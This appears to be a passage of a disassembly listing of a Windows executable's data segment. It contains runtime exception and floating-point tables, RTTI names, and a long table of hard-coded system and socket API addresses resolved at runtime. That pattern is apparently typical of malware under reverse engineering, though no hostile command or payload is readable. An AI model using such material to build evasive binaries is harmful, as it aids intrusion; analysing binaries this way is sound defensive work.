dword_436100 dd 1 ; DATA XREF: sub_41E92D+3C�o
; sub_41EF44+C�o
dword_436104 dd 16h ; DATA XREF: sub_41EF44:loc_41EF79�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_436268 dd 0C0000005h ; DATA XREF: sub_41EF44+19�o
; sub_41F0EC+A�r ...
dword_43626C dd 0Bh ; DATA XREF: sub_421D69+A�r
dd 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_4362E0 dd 3 ; DATA XREF: sub_41EFAB+58�r
; sub_421C3C+C8�r
dword_4362E4 dd 7 ; DATA XREF: sub_41EFAB+5E�r
; sub_421C3C+CD�r
dword_4362E8 dd 0Ah ; DATA XREF: sub_41F0EC+4�r
; sub_421D69+4�r
dword_4362EC dd 8Ch ; DATA XREF: sub_41EFAB+82�r
; sub_41EFAB+8F�w ...
dword_4362F0 dd 0FFFFFFFFh, 0A00h ; DATA XREF: sub_419D23:loc_419DE0�o
; sub_41E248:loc_41E2C9�o
dword_4362F8 dd 2 ; DATA XREF: sub_41F885+E�o
; sub_41F885+28�r
off_4362FC dd offset aR6002FloatingP ; DATA XREF: sub_41F885+FC�r
; sub_41F885+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 424B2Ch, 9, 424B00h, 0Ah, 424ADCh, 10h, 424AB0h
dd 11h, 424A80h, 12h, 424A5Ch, 13h, 424A30h, 18h, 4249F8h
dd 19h, 4249D0h, 1Ah, 424998h, 1Bh, 424960h, 1Ch, 424938h
dd 78h, 424928h, 79h, 424918h, 7Ah, 424908h, 0FCh, 42A3B0h
dd 0FFh, 4248F8h
off_436388 dd offset dword_4CDCC0 ; DATA XREF: sub_41F885+1B�o
; sub_41FA42+55�o
align 10h
dd offset dword_4CDCC0
dd 101h
dword_436398 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41FA42+72�o
dd 1000h, 0
dword_4363A8 dd 3 dup(0) ; DATA XREF: sub_419D23+50�o
; sub_41A8A2+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_4363C8 dd 3 dup(0) ; DATA XREF: sub_419D23+58�o
; sub_41A8A2:loc_41A8C0�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_4363F8 dd 84h dup(0) ; DATA XREF: sub_41FA42+9B�o
dword_436608 dd 2694h ; DATA XREF: sub_41BF55+3�r
; sub_41BFA8+46�r ...
align 10h
dword_436610 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_42064E�o
dword_436628 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_420664�o
dword_436640 dd 7080h ; DATA XREF: sub_41D609+76�r
; sub_42094E+5E�w ...
dword_436644 dd 1 ; DATA XREF: sub_41D609+98�r
; sub_42094E+8B�w ...
dword_436648 dd 0FFFFF1F0h ; DATA XREF: sub_41D609:loc_41D6BB�r
; sub_42094E+94�w ...
dword_43664C dd 545350h, 0Fh dup(0) ; DATA XREF: _2:off_4366CC�o
dword_43668C dd 544450h, 0Fh dup(0) ; DATA XREF: _2:off_4366D0�o
off_4366CC dd offset dword_43664C ; DATA XREF: sub_42094E+BA�r
; sub_42094E+D9�r ...
off_4366D0 dd offset dword_43668C ; DATA XREF: sub_42094E+F4�r
; sub_42094E+11B�r ...
align 8
dword_4366D8 dd 0FFFFFFFFh ; DATA XREF: sub_42094E+1D�w
; sub_420BAC+1E�r ...
dword_4366DC dd 0 ; DATA XREF: sub_420BAC:loc_420CE0�r
; sub_420D58+BF�w
dword_4366E0 dd 0 ; DATA XREF: sub_420BAC+192�r
; sub_420D58+E0�w
align 8
dword_4366E8 dd 0FFFFFFFFh ; DATA XREF: sub_42094E+17�w
; sub_420BAC+26�r ...
dword_4366EC dd 0 ; DATA XREF: sub_420BAC+13A�r
; sub_420D58+EA�w ...
dword_4366F0 dd 0 ; DATA XREF: sub_420BAC+1A1�r
; sub_420D58+23�r ...
dword_4366F4 dd 0FFFFFFFFh ; DATA XREF: sub_420D58+84�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_436724 dd 16Dh ; DATA XREF: sub_41D609+2A�r
; sub_420D58+2E�r ...
dword_436728 dd 0FFFFFFFFh ; DATA XREF: sub_420D58:loc_420DE4�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_436760 dd 2 dup(0) ; DATA XREF: sub_4220C1+7�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_4368C0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_4220C1+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh
off_436A1C dd offset off_424D00 ; DATA XREF: _1:00424EDC�o _1:00424FC8�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_436A34 dd offset off_424D00 ; DATA XREF: _1:off_424D90�o
; _1:00424DD0�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_436A54 dd offset off_424D00 ; DATA XREF: _1:off_424DD8�o
; _1:00424E1C�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_436A74 dd offset off_424D00 ; DATA XREF: _1:off_424E24�o
; _1:00424E68�o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 8
off_436A98 dd offset off_424D00 ; DATA XREF: _1:off_424E70�o
; _1:00424EAC�o
align 10h
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset sub_42086E
align 8
byte_436AB8 db 0 ; DATA XREF: sub_40144A+1D3�w
; sub_40144A+2D2�o
align 2
word_436ABA dw 0 ; DATA XREF: sub_40144A+1E3�w
word_436ABC dw 0 ; DATA XREF: sub_40144A+1E9�w
word_436ABE dw 0 ; DATA XREF: sub_40144A+1F0�w
byte_436AC0 db 0 ; DATA XREF: sub_40144A+1F7�w
byte_436AC1 db 0 ; DATA XREF: sub_40144A+1FE�w
word_436AC2 dw 0 ; DATA XREF: sub_40144A+204�w
dword_436AC4 dd 0 ; DATA XREF: sub_40144A+234�w
; sub_40144A+250�w
dword_436AC8 dd 0 ; DATA XREF: sub_40144A+258�w
byte_436ACC db 0 ; DATA XREF: sub_40144A+26A�w
byte_436ACD db 0 ; DATA XREF: sub_40144A+27D�w
word_436ACE dw 0 ; DATA XREF: sub_40144A+295�w
word_436AD0 dw 0 ; DATA XREF: sub_40144A+2A4�w
word_436AD2 dw 0 ; DATA XREF: sub_40144A+29C�w
dword_436AD4 dd 101h dup(0) ; DATA XREF: sub_40144A+2B9�o
dword_436ED8 dd 0 ; DATA XREF: sub_4029E9+9E�o
byte_436EDC db 0 ; DATA XREF: sub_4029E9+36�r
; sub_402ACC+37�r ...
align 10h
dword_436EE0 dd 7A5h ; DATA XREF: sub_4030D1+10�w
; sub_4030E8+30�r ...
dd 2 dup(0)
dword_436EEC dd 2 dup(0) ; DATA XREF: sub_403EBA+68�o
dword_436EF4 dd 0 ; DATA XREF: sub_40395A+13�o
; sub_40EE72+610D�o ...
dword_436EF8 dd 2080Ah ; DATA XREF: sub_404853+8�w
; sub_40494F+2D3�o
align 10h
dword_436F00 dd 2 dup(0) ; DATA XREF: sub_40494F+209�o
dword_436F08 dd 0 ; DATA XREF: sub_4059DB+2A�w
; sub_4059DB+51�r ...
dword_436F0C dd 0 ; DATA XREF: sub_4030E8+AE�r
; _0:004042D4�r ...
dd 2 dup(0)
dword_436F18 dd 0 ; DATA XREF: sub_4071DB+18�r
; sub_40762E+92�w ...
dword_436F1C dd 0 ; DATA XREF: sub_407767+4D�r
; sub_40797F+D9�w ...
dd 7FEh dup(0)
dword_438F18 dd 6 dup(0) ; DATA XREF: sub_407767+D2�o
; sub_407767+13B�o ...
dword_438F30 dd 0 ; DATA XREF: sub_407252+82�w
; sub_407252+102�o
dword_438F34 dd 41h dup(0) ; DATA XREF: sub_407252+41�o
dword_439038 dd 41h dup(0) ; DATA XREF: sub_407252+63�o
dword_43913C dd 0 ; DATA XREF: sub_407252+F8�w
; sub_407252+114�r
dword_439140 dd 0 ; DATA XREF: sub_407252+52�w
dword_439144 dd 0 ; DATA XREF: sub_407252+4D�w
; sub_407252+CF�r
dword_439148 dd 20h dup(0) ; DATA XREF: sub_407252+9A�o
; sub_407252+BA�o
dword_4391C8 dd 0 ; DATA XREF: sub_407252+8F�w
dword_4391CC dd 0 ; DATA XREF: sub_407252+A7�w
; sub_407252+C7�w
dword_4391D0 dd 0 ; DATA XREF: sub_407252:loc_40737C�r
align 8
dword_4391D8 dd 0 ; DATA XREF: sub_407252+2D5�w
; sub_407252+32E�o
dword_4391DC dd 0A2h dup(0) ; DATA XREF: sub_407252+2C3�o
dword_439464 dd 41h dup(0) ; DATA XREF: sub_407252+28D�o
dword_439568 dd 0 ; DATA XREF: sub_407252+2BA�w
; sub_407252+2E1�r
align 10h
dword_439570 dd 0 ; DATA XREF: sub_407252+324�w
; sub_407252+340�r
dword_439574 dd 0 ; DATA XREF: sub_407252+2E7�w
dword_439578 dd 0 ; DATA XREF: sub_407252+2F4�w
dword_43957C dd 0 ; DATA XREF: sub_407252+2B4�w
dd 0
dword_439584 dd 0 ; DATA XREF: sub_407252:loc_4075A8�r
dword_439588 dd 0 ; DATA XREF: sub_407252+1A1�w
; sub_407252+221�o
dword_43958C dd 41h dup(0) ; DATA XREF: sub_407252+163�o
dword_439690 dd 41h dup(0) ; DATA XREF: sub_407252+182�o
dword_439794 dd 0 ; DATA XREF: sub_407252+217�w
; sub_407252+233�r
dword_439798 dd 0 ; DATA XREF: sub_407252+171�w
dword_43979C dd 0 ; DATA XREF: sub_407252+1EE�r
dword_4397A0 dd 20h dup(0) ; DATA XREF: sub_407252+1B9�o
; sub_407252+1D9�o
dword_439820 dd 0 ; DATA XREF: sub_407252+1AE�w
dword_439824 dd 0 ; DATA XREF: sub_407252+1C6�w
; sub_407252+1E6�w
dword_439828 dd 0 ; DATA XREF: sub_407252:loc_40749C�r
align 10h
dword_439830 dd 0 ; DATA XREF: sub_4087EE+F�r
; sub_4089E7+12�r
align 8
dword_439838 dd 80h dup(0) ; DATA XREF: sub_409706+41�o
dword_439A38 dd 200h dup(0) ; DATA XREF: sub_409037+C7�o
; sub_409392+DD�o ...
dword_43A238 dd 200h dup(0) ; DATA XREF: sub_409037+D6�o
; sub_409392+F4�o ...
dword_43AA38 dd 0 ; DATA XREF: sub_409037+86�w
; sub_409209+94�r
dword_43AA3C dd 0 ; DATA XREF: sub_409037+A7�w
; sub_40966F+55�r ...
dword_43AA40 dd 0 ; DATA XREF: sub_409037+A0�w
; sub_409209+D6�r ...
dword_43AA44 dd 0 ; DATA XREF: sub_409037+79�w
; sub_409209+35�r ...
dword_43AA48 dd 80h dup(0) ; DATA XREF: sub_40966F+5E�o
dword_43AC48 dd 0 ; DATA XREF: sub_409037+93�w
; sub_409209+A2�r
align 10h
dword_43AC50 dd 0 ; DATA XREF: sub_409037+E7�o
; sub_409037+103�r ...
dword_43AC54 dd 0 ; DATA XREF: sub_409392+17B�w
; sub_409539+107�w
dword_43AC58 dd 0 ; DATA XREF: sub_409392+180�w
; sub_409539+10D�w ...
dword_43AC5C dd 0 ; DATA XREF: sub_409392+159�w
; sub_40966F+4F�r
dword_43AC60 dd 77C72C6Bh ; DATA XREF: sub_4085B3+210�r
; sub_4085B3+21A�r ...
dword_43AC64 dd 77EBA994h ; DATA XREF: sub_40981F+65�w
; sub_41518A+F5�r
dword_43AC68 dd 7622A3F4h ; DATA XREF: sub_40981F+7ED�w
; sub_40981F+862�r ...
dword_43AC6C dd 71C45229h ; DATA XREF: sub_40981F+9BA�w
; sub_40981F+A18�r ...
dword_43AC70 dd 71C24870h ; DATA XREF: sub_40981F+96C�w
; sub_40981F+9E8�r ...
dword_43AC74 dd 77C71BB0h ; DATA XREF: sub_4085B3+D1�r
; sub_40981F+46F�w ...
dword_43AC78 dd 77D4808Bh ; DATA XREF: sub_4023A7+EC�r
; sub_4023A7+109�r ...
dword_43AC7C dd 71C4502Ch ; DATA XREF: sub_40981F+9AD�w
; sub_40981F+A10�r ...
dword_43AC80 dd 77DE801Bh ; DATA XREF: sub_40981F+354�w
; sub_40981F+3A9�r ...
dword_43AC84 dd 77DDACABh ; DATA XREF: sub_40981F+3F1�w
; sub_40B8D8+11E�r
dword_43AC88 dd 77DE8075h ; DATA XREF: sub_40981F+361�w
; sub_40981F+3B1�r ...
dword_43AC8C dd 77DD7496h ; DATA XREF: sub_40981F+3A2�w
; sub_40DCE6+AD�r
dword_43AC90 dd 71AB1B7Bh ; DATA XREF: sub_405AF2+115�r
; sub_4084B3+7D�r ...
dword_43AC94 dd 77E686CCh ; DATA XREF: sub_40981F+72�w
; sub_40981F+D2�r ...
dword_43AC98 dd 71C2498Bh ; DATA XREF: sub_40981F+95F�w
; sub_40981F+9DB�r ...
dword_43AC9C dd 77DDAB2Fh ; DATA XREF: sub_40981F+388�w
; sub_40981F+3C9�r ...
dword_43ACA0 dd 7620E8C3h ; DATA XREF: sub_40981F+83B�w
; sub_40981F+88E�r ...
dword_43ACA4 dd 77DD23D7h ; DATA XREF: sub_408C26+58�r
; sub_40981F+2A5�w ...
dword_43ACA8 dd 76214750h ; DATA XREF: sub_40981F+82E�w
; sub_40981F+886�r ...
dword_43ACAC dd 77E6D75Bh ; DATA XREF: sub_40981F+B3�w
dword_43ACB0 dd 7620BD61h ; DATA XREF: sub_40981F+848�w
; sub_40981F+896�r ...
dword_43ACB4 dd 71AB60C9h ; DATA XREF: sub_407BDE+7E�r
; sub_40981F+52F�w ...
dword_43ACB8 dd 77EBA6E9h ; DATA XREF: sub_40981F+58�w
; sub_40981F+CA�r ...
dword_43ACBC dd 76D62A58h ; DATA XREF: sub_40981F+916�w
; sub_40AF86+11A�r
dword_43ACC0 dd 76F36EAAh ; DATA XREF: sub_40981F+A66�w
; sub_40981F+A6D�r ...
dword_43ACC4 dd 77E802FCh ; DATA XREF: sub_40981F+A6�w
; sub_40981F+F2�r
dword_43ACC8 dd 77C75455h ; DATA XREF: sub_4085B3+119�r
; sub_40981F+462�w ...
dword_43ACCC dd 71AB12A7h ; DATA XREF: sub_4075E6+20�r
; sub_40981F+5D8�w ...
dword_43ACD0 dd 71C574FAh ; DATA XREF: sub_40981F+9A0�w
; sub_40981F+A08�r
dword_43ACD4 dd 71AB1746h ; DATA XREF: sub_402688+280�r
; sub_40981F+5CB�w ...
dword_43ACD8 dd 71B28D0Dh ; DATA XREF: sub_402ACC+9A�r
; sub_40981F+B21�w
dword_43ACDC dd 762211EFh ; DATA XREF: sub_40981F+7E0�w
; sub_40981F+84F�r ...
dword_43ACE0 dd 77D902E3h ; DATA XREF: sub_40981F+1B3�w
; sub_40AC20+15�r
dword_43ACE4 dd 71C2FA86h ; DATA XREF: sub_40981F+979�w
; sub_40981F+9F0�r ...
dword_43ACE8 dd 77DE1291h ; DATA XREF: sub_40981F+36E�w
; sub_40981F+3B9�r ...
dword_43ACEC dd 77E2C1B3h ; DATA XREF: sub_40981F+37B�w
; sub_40981F+3C1�r ...
dword_43ACF0 dd 73B81E3Bh ; DATA XREF: sub_4087EE+28�r
; sub_4089E7+2B�r ...
dword_43ACF4 dd 71ABF628h ; DATA XREF: sub_40981F+68E�w
; sub_415480+D0�r
dword_43ACF8 dd 71AB1836h ; DATA XREF: sub_4010B5:loc_4013E0�r
; sub_401A76:loc_401D1C�r ...
dword_43ACFC dd 77C72889h ; DATA XREF: sub_4085B3+207�r
; sub_40981F+496�w
dword_43AD00 dd 71C453F8h ; DATA XREF: sub_40981F+9C7�w
; sub_40981F+A20�r ...
dword_43AD04 dd 77DD5C55h ; DATA XREF: sub_40981F+2B2�w
; sub_40981F+2DE�r ...
dword_43AD08 dd 77E96645h ; DATA XREF: sub_40981F+7F�w
; sub_40981F+DA�r ...
dword_43AD0C dd 77428B97h ; DATA XREF: sub_40981F+B6E�w
; sub_40981F+B75�r ...
dword_43AD10 dd 71AB41DAh ; DATA XREF: sub_4010B5+2F�r
; sub_401A76+2F�r ...
dword_43AD14 dd 762059A3h ; DATA XREF: sub_40981F+807�w
; sub_40981F+872�r ...
dword_43AD18 dd 71C4A1B4h ; DATA XREF: sub_40981F+986�w
; sub_40981F+9F8�r
dword_43AD1C dd 1F7CD214h ; DATA XREF: sub_40981F+BDF�w
; sub_40981F+C10�r
dword_43AD20 dd 77D4456Bh ; DATA XREF: sub_4023A7+40�r
; sub_4023A7+63�r ...
dword_43AD24 dd 76D629BBh ; DATA XREF: sub_40981F+8FC�w
; sub_40981F+910�r ...
dword_43AD28 dd 1F7B9D96h ; DATA XREF: sub_40981F+BF9�w
dword_43AD2C dd 71AB1740h ; DATA XREF: sub_4010B5:loc_4013AA�r
; sub_40144A+3C�r ...
dword_43AD30 dd 7620AFB6h ; DATA XREF: sub_40981F+821�w
; sub_40981F+855�r
dword_43AD34 dd 77D5C13Ah ; DATA XREF: sub_4023A7+50�r
; sub_4023A7+78�r ...
dword_43AD38 dd 77D45B19h ; DATA XREF: sub_4087EE+3F�r
; sub_4087EE+69�r ...
dword_43AD3C dd 71AB157Eh ; DATA XREF: sub_40981F+65A�w
; sub_40981F+786�r ...
dword_43AD40 dd 71AB3E5Dh ; DATA XREF: sub_402DD7+20A�r
; sub_4030E8+5E�r ...
dword_43AD44 dd 71AB14DCh ; DATA XREF: sub_402688+16E�r
; sub_40981F+549�w ...
dword_43AD48 dd 0CC0004h ; DATA XREF: sub_40981F+8BD�w
; sub_40981F:loc_40A0FA�w ...
dword_43AD4C dd 77DD590Bh ; DATA XREF: sub_40981F+28B�w
; sub_40981F+2C6�r ...
dword_43AD50 dd 71ABD755h ; DATA XREF: sub_407D66+98�r
; sub_40981F+681�w ...
dword_43AD54 dd 77DF7311h ; DATA XREF: sub_40981F+30F�w
; sub_40981F+323�r ...
dword_43AD58 dd 77DDA2AFh ; DATA XREF: sub_40981F+395�w
; sub_40981F+3D1�r ...
dword_43AD5C dd 1F7CD927h ; DATA XREF: sub_40981F+BD2�w
; sub_40981F+C08�r
dword_43AD60 dd 76206853h ; DATA XREF: sub_40981F+7FA�w
; sub_40981F+86A�r ...
dword_43AD64 dd 77D4932Ch ; DATA XREF: sub_4023A7+FC�r
; sub_40981F+206�w ...
dword_43AD68 dd 77D5E310h ; DATA XREF: sub_40981F+18C�w
; sub_40981F+1D2�r ...
dword_43AD6C dd 76206B7Fh ; DATA XREF: sub_40981F+814�w
; sub_40981F+87A�r ...
dword_43AD70 dd 71AB1444h ; DATA XREF: sub_406C19+244�r
; sub_40981F+606�w ...
dword_43AD74 dd 77DD189Ah ; DATA XREF: sub_408C26+18A�r
; sub_40981F+2BF�w ...
dword_43AD78 dd 71AB3F8Dh ; DATA XREF: sub_4010B5+6F�r
; sub_40144A+AA�r ...
dword_43AD7C dd 77DD5D20h ; DATA XREF: sub_40981F+302�w
; sub_40981F+316�r ...
dword_43AD80 dd 71AB1890h ; DATA XREF: sub_405AF2+F9�r
; sub_406C19+1FC�r ...
dword_43AD84 dd 77C76B34h ; DATA XREF: sub_4085B3+16�r
; sub_40981F+42E�w ...
dword_43AD88 dd 77D5E38Ch ; DATA XREF: sub_40981F+199�w
; sub_40981F+1DA�r ...
dword_43AD8C dd 77DDA20Bh ; DATA XREF: sub_40981F+347�w
; sub_40981F+39C�r ...
dword_43AD90 dd 76F36EEBh ; DATA XREF: sub_40981F+A73�w
dword_43AD94 dd 71AB12A7h ; DATA XREF: sub_4010B5+EB�r
; sub_4010B5+1F9�r ...
dword_43AD98 dd 71AB1746h ; DATA XREF: sub_4010B5+87�r
; sub_4010B5+9D�r ...
dword_43AD9C dd 77EBA595h ; DATA XREF: sub_40981F+4B�w
; sub_40981F+C2�r ...
dword_43ADA0 dd 77C7531Dh ; DATA XREF: sub_4085B3+2C�r
; sub_4085B3+38�r ...
dword_43ADA4 dd 77D4BDCAh ; DATA XREF: sub_40981F+165�w
; sub_40981F+1BA�r ...
dword_43ADA8 dd 71C3516Ah ; DATA XREF: sub_40981F+9E1�w
; sub_40E5EB+72�r
dword_43ADAC dd 71AB32CAh ; DATA XREF: sub_40981F+667�w
; sub_40981F+78E�r
dword_43ADB0 dd 71AB5690h ; DATA XREF: sub_402688+205�r
; sub_402DD7+23B�r ...
dword_43ADB4 dd 1F7CB8F8h ; DATA XREF: sub_40981F+BEC�w
; sub_40981F+C18�r
dword_43ADB8 dd 77EBB1E7h ; DATA XREF: sub_40981F+3E�w
; sub_40981F+BA�r ...
dword_43ADBC dd 77DD59F0h ; DATA XREF: sub_40981F+298�w
; sub_40981F+2CE�r ...
dword_43ADC0 dd 71AB5DE2h ; DATA XREF: sub_405AF2+9E�r
; sub_407BDE+9C�r ...
dword_43ADC4 dd 71AB3ECEh ; DATA XREF: sub_402688+EB�r
; sub_405AF2+89�r ...
dword_43ADC8 dd 73B81B0Fh ; DATA XREF: sub_40981F+C63�w
; sub_40EE72+4624�r
dword_43ADCC dd 76204E4Dh ; DATA XREF: sub_40981F+85B�w
; sub_40BC4B+205�r ...
dword_43ADD0 dd 0 ; DATA XREF: sub_40981F+112�w
dword_43ADD4 dd 1F7D886Ah ; DATA XREF: sub_40981F+BB8�w
; sub_40981F+BF3�r
dword_43ADD8 dd 71AB12F8h ; DATA XREF: sub_40144A+119�r
; sub_40144A+1A0�r ...
dword_43ADDC dd 77C76551h ; DATA XREF: sub_4085B3+BC�r
; sub_40981F+43B�w ...
dword_43ADE0 dd 77C729E2h ; DATA XREF: sub_4085B3+FB�r
; sub_40981F+47C�w ...
dword_43ADE4 dd 77C7212Fh ; DATA XREF: sub_4085B3+65�r
; sub_40981F+448�w ...
dword_43ADE8 dd 71AB1AF4h ; DATA XREF: sub_402DD7+221�r
; sub_402DD7+249�r ...
dword_43ADEC dd 77D5E303h ; DATA XREF: sub_40981F+1A6�w
; sub_40981F+1E2�r ...
dword_43ADF0 dd 71C4576Ch ; DATA XREF: sub_40981F+9D4�w
; sub_40981F+A28�r ...
dword_43ADF4 dd 77D4702Fh ; DATA XREF: sub_4087EE+53�r
; sub_4087EE+7F�r ...
dword_43ADF8 dd 77E6C0E3h ; DATA XREF: sub_40981F+8C�w
; sub_40981F+E2�r ...
dword_43ADFC dd 71AB1ED3h ; DATA XREF: sub_4010B5+2C2�r
; sub_40144A+2DA�r ...
dword_43AE00 dd 71B2A381h ; DATA XREF: sub_40981F+B14�w
; sub_40981F+B30�r
dword_43AE04 dd 77DDA595h ; DATA XREF: sub_40981F+31C�w
; sub_41511F+55�r
dword_43AE08 dd 77DD22EAh ; DATA XREF: sub_408C26+3F�r
; sub_40981F+27E�w ...
dword_43AE0C dd 773F97B0h ; DATA XREF: sub_40981F+B7B�w
dword_43AE10 dd 76D67A29h ; DATA XREF: sub_40981F+ABD�w
; sub_40AE02+CE�r
dword_43AE14 dd 76D674FAh ; DATA XREF: sub_40981F+AB0�w
; sub_40981F+AB7�r ...
dword_43AE18 dd 71AB3C22h ; DATA XREF: sub_40144A+2E�r
; sub_401D82+55�r ...
dword_43AE1C dd 71AB2BBFh ; DATA XREF: sub_407D66+88�r
; sub_40981F+674�w ...
dword_43AE20 dd 1F7BA3A9h ; DATA XREF: sub_40981F+BC5�w
; sub_40981F+C00�r
dword_43AE24 dd 71AB401Ch ; DATA XREF: sub_402688+28D�r
; sub_406C19+250�r ...
dword_43AE28 dd 71C214BAh ; DATA XREF: sub_40981F+993�w
; sub_40981F+A00�r ...
dword_43AE2C dd 71AB868Dh ; DATA XREF: sub_405AF2+13A�r
; sub_407BDE+B3�r ...
dword_43AE30 dd 71AB1A6Dh ; DATA XREF: sub_4010B5+324�r
; sub_40144A+2F0�r ...
dword_43AE34 dd 71AB155Ah ; DATA XREF: sub_405AF2+B7�r
; sub_405AF2+39F�r ...
dword_43AE38 dd 71B22C25h ; DATA XREF: sub_4029E9+B0�r
; sub_4029E9+C8�r ...
dword_43AE3C dd 71AB5A01h ; DATA XREF: sub_4010B5+4F�r
; sub_401A76+4F�r ...
dword_43AE40 dd 71B2ACCBh ; DATA XREF: sub_40981F+AFA�w
; sub_40981F+B1B�r
dword_43AE44 dd 77E78C17h ; DATA XREF: sub_40981F+31�w
; sub_40981F+AD�r ...
dword_43AE48 dd 77D49A11h ; DATA XREF: sub_4087EE+1EC�r
; sub_4089E7+232�r ...
align 10h
dword_43AE50 dd 76D62A37h ; DATA XREF: sub_40981F+909�w
; sub_40981F+91D�r ...
off_43AE54 dd offset sub_4DF1C7 ; DATA XREF: sub_40981F+99�w
; sub_40981F+EA�r ...
dword_43AE58 dd 0 ; DATA XREF: sub_40981F:loc_40991D�w
; sub_40981F+12B�w ...
dword_43AE5C dd 0 ; DATA XREF: sub_40981F+126�w
; sub_40A4AC+1C�r
dword_43AE60 dd 0 ; DATA XREF: sub_40981F:loc_409A0D�w
; sub_40981F:loc_409A74�w ...
dword_43AE64 dd 0 ; DATA XREF: sub_40981F+250�w
; sub_40A4AC+50�r
dword_43AE68 dd 0 ; DATA XREF: sub_40981F:loc_409B09�w
; sub_40981F:loc_409B4E�w ...
dword_43AE6C dd 0 ; DATA XREF: sub_40981F+400�w
; sub_40A4AC+84�r
dword_43AE70 dd 0 ; DATA XREF: sub_40981F:loc_409D05�w
; sub_40A4AC:loc_40A55C�r
dword_43AE74 dd 0 ; DATA XREF: sub_40981F+4E1�w
; sub_40A4AC+B8�r
dword_43AE78 dd 0 ; DATA XREF: sub_40981F:loc_409FD6�w
; sub_40A4AC:loc_40A590�r
